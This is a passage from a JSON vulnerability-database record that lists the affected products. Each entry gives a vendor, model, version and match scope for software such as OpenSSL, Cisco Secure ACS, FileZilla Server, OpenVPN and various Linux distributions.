            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "works common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "series airespace wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "20003.1.59.24"
          },
          {
            "_id": null,
            "model": "-release-p20",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "_id": null,
            "model": "linux personal x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "grid engine update2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8"
          },
          {
            "_id": null,
            "model": "appliance server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "ciscosecure acs appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1111"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.3"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.193"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6(1)"
          },
          {
            "_id": null,
            "model": "filezilla",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.15"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "secure linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "security mars",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4480"
          },
          {
            "_id": null,
            "model": "call manager sr1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "unified presence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "predictive dialing system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.4"
          },
          {
            "_id": null,
            "model": "project openssl l",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r4.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.4"
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.6"
          },
          {
            "_id": null,
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.13"
          },
          {
            "_id": null,
            "model": "insight management agents for tru64 unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.5.2"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "call manager es33",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.2.3"
          },
          {
            "_id": null,
            "model": "s8300 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.3.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "_id": null,
            "model": "networks ip address domain manager",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.8"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "f...",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.3"
          },
          {
            "_id": null,
            "model": "-prerelease",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.0"
          },
          {
            "_id": null,
            "model": "beta11",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "grid engine 32-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "_id": null,
            "model": "mds 9216i",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux ws ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.3"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r3.6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "s8710 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "_id": null,
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "stonebeat fullcluster for raptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.00",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "filezilla",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.28"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.31",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "linux personal x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.9"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r3.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.8"
          },
          {
            "_id": null,
            "model": "computing snapgear sg710",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.3"
          },
          {
            "_id": null,
            "model": "call manager es62",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "solaris 9 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.1"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3.132"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.2.1"
          },
          {
            "_id": null,
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90002.0(0.86)"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "255"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "_id": null,
            "model": "css11500 content services switch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.10.2.65"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.4"
          },
          {
            "_id": null,
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "sip proxy server",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "238"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "openvms secure web server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "enterprise linux as ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "server b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3.5.1"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.1.3"
          },
          {
            "_id": null,
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3.6.1"
          },
          {
            "_id": null,
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "275"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "stonebeat webcluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "grid engine update3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "s8500",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "_id": null,
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3.2"
          },
          {
            "_id": null,
            "model": "project openssl beta3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.639"
          },
          {
            "_id": null,
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "245"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.5"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.9"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "_id": null,
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "networks meridian option 11c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.4"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(2)"
          },
          {
            "_id": null,
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "messaging storage server mm3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "grid engine 64-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "s8500 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "s8710 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "advanced workstation for the itanium processor ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "hat red hat network satellite server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1700"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.7"
          },
          {
            "_id": null,
            "model": "grid engine update4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "_id": null,
            "model": "ons mspp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "_id": null,
            "model": "5.4-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.3.30"
          },
          {
            "_id": null,
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "project openssl d",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3.728"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.3(1)"
          },
          {
            "_id": null,
            "model": "linux -current",
            "scope": null,
            "trust": 0.3,
            "vendor": "slackware",
            "version": null
          },
          {
            "_id": null,
            "model": "grid engine update6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "home",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "_id": null,
            "model": "stonebeat fullcluster for firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.3"
          },
          {
            "_id": null,
            "model": "ciscosecure acs for windows and unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r2.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "tru64 b-4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "_id": null,
            "model": "stonebeat fullcluster for isa server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "call manager es55",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(0)"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0"
          },
          {
            "_id": null,
            "model": "css11500 content services switch",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.5"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "server 0.9.4e",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "_id": null,
            "model": "tru64 b-3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.657"
          },
          {
            "_id": null,
            "model": "secure enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "advanced workstation for the itanium processor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "265"
          },
          {
            "_id": null,
            "model": "call manager es24",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3"
          },
          {
            "_id": null,
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44910"
          },
          {
            "_id": null,
            "model": "s8300 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "computing snapgear u2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "secure",
            "version": "3.1.4"
          },
          {
            "_id": null,
            "model": "novell linux pos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154542.3(5)"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.01"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "_id": null,
            "model": "project openssl beta1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.5"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
